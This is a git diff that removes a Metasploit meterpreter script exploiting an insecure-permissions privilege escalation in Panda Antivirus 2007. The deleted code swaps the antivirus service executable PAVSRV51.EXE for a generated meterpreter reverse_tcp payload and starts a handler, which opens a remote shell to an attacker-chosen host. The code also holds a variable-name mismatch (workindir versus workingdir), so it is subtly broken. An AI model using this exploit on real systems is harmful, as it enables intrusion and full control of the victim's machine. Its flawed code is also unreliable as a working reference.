diff --git a/scripts/meterpreter/panda_2007_pavsrv51.rb b/scripts/meterpreter/panda_2007_pavsrv51.rb deleted file mode 100644 index 031dcf1d5b..0000000000 --- a/scripts/meterpreter/panda_2007_pavsrv51.rb +++ /dev/null @@ -1,115 +0,0 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# https://metasploit.com/framework/ -## - -## -# WARNING: Metasploit no longer maintains or accepts meterpreter scripts. -# If you'd like to improve this script, please try to port it as a post -# module instead. Thank you. -## - - - -## -# Panda Antivirus 2007 Local Privilege Escalation -# This module exploits a privilege escalation vulnerability in -# Panda Antivirus 2007. Due to insecure permission issues, a -# local attacker can gain elevated privileges. -# -# This script has only been tested against Panda Antivirus 2007. -# -# BID - 4257 -# mc[@]metasploit.com -## - -# -# Options -# -@exec_opts = Rex::Parser::Arguments.new( - "-h" => [ false, "This help menu"], - "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"], - "-p" => [ true, "The port on the remote host where Metasploit is listening"] -) - -# -# Default parameters -# -rhost = nil -rport = nil - -def usage - print_status("Panda Antivirus 2007 Privilege Escalation.") - print_line(@exec_opts.usage) - raise Rex::Script::Completed -end - -# -# Option parsing -# -@exec_opts.parse(args) do |opt, idx, val| - case opt - when "-r" - rhost = val - when "-p" - rport = val.to_i - else - usage - end -end - -if rhost.nil? or rport.nil? - usage -elsif client.platform == 'windows' - client.sys.process.get_processes().each do |m| - - if ( m['name'] =~ /PAVSRV51\.EXE/ ) - print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.") - - # Build out the exe payload. - pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp") - pay.datastore['LHOST'] = rhost - pay.datastore['LPORT'] = rport - raw = pay.generate - - exe = Msf::Util::EXE.to_win32pe(client.framework, raw) - - # Change to our working directory. - workingdir = client.sys.config.getenv('ProgramFiles') + "\\Panda Software\\Panda Antivirus 2007\\" - client.fs.dir.chdir(workindir) - - # Create a backup of the original exe. - print_status("Creating a copy of PAVSRV51 (PAVSRV51_back.EXE)...") - client.sys.process.execute("cmd.exe /c rename PAVSRV51.EXE PAVSRV51_back.EXE", nil, {'Hidden' => 'true'}) - - # Place our newly created exe with the orginal binary name. - tempexe = workingdir + "PAVSRV51.EXE" - - print_status("Sending EXE payload '#{tempexe}'.") - fd = client.fs.file.new(tempexe, "wb") - fd.write(exe) - fd.close - - print_status("Done, now just wait for the callback...") - - # Our handler to recieve the callback. - handler = client.framework.exploits.create("multi/handler") - handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp" - handler.datastore['LHOST'] = rhost - handler.datastore['LPORT'] = rport - # Keep our shell stable. - handler.datastore['InitialAutoRunScript'] = "migrate -f" - handler.datastore['ExitOnSession'] = false - - handler.exploit_simple( - 'Payload' => handler.datastore['PAYLOAD'], - 'RunAsJob' => true - ) - end - end -else - print_error("This version of Meterpreter is not supported with this script!") - raise Rex::Script::Completed -end